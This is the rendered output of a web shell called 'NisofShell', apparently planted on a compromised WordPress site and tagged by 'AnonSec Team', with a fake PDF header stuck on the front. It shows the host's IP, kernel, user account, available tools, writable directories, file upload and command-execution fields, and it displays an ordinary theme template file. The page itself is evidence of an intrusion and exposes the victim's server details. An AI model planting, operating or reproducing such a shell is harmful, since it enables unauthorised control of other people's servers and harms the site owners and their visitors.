%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Nisof Was Here
NisofShell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.162
Web Server : Apache
System : Linux webm002.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : wellingtpa ( 97533)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wellingtpa/wellingtonrecord/wp-content/themes/kata/template-parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/wellingtpa/wellingtonrecord/wp-content/themes/kata/template-parts/content-search.php
<?php
/**
 * The template for displaying search results
 *
 * Used for both singular and index.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @author  ClimaxThemes
 * @package Kata
 * @since   1.0.0
 */

// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}
?>

<div <?php post_class( 'kata-default-post kata-default-loop loop-two' ); ?>>
	<div class="kata-post-details">            
		<div class="post-content-header">
			<div class="row">
				<?php
				if ( has_post_thumbnail() ) {
					?>
				<div class="col-md-4">
					<div class="kata-post-thumbnail">
						<?php Kata_Helpers::image_resize_output( get_post_thumbnail_id(), array( '300', '300' ) ); ?>
					</div>
				</div>
					<?php
				}
				$content_class = has_post_thumbnail() ? 'col-md-5' : 'col-md-9';
				?>
				<div class="<?php echo esc_attr( $content_class ); ?>">
					<div class="kata-post-categories">
						<?php Kata_Template_Tags::post_categories(); ?>
					</div>                                          
					<div class="kata-post-content-wrap">
						<div class="kata-post-title-wrap">
							<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>">                               
								<h2 class="kata-post-title-loop-two"><?php the_title(); ?></h2>                                
							</a>   
						</div>	                     
						<div class="kata-post-excerpt">                                
							<p><?php echo esc_html( Kata_Template_Tags::excerpt( 15 ) ); ?></p>
						</div>	    
					</div>                                     
				</div>
				<div class="col-md-3">
					<div class="kata-post-default-meta">
						<div class="kata-post-date-wrap">
							<span><?php echo esc_html__( 'Date:', 'kata' ); ?></span>
							<?php Kata_Template_Tags::post_date(); ?>
						</div>
						<div class="kata-post-author-wrap">
							<span><?php echo esc_html__( 'Author:', 'kata' ); ?></span>
							<?php Kata_Template_Tags::post_author(); ?>
						</div>
					</div>
				</div>
			</div>	
		</div>	
	</div>
</div>

Anon7 - 2022
AnonSec Team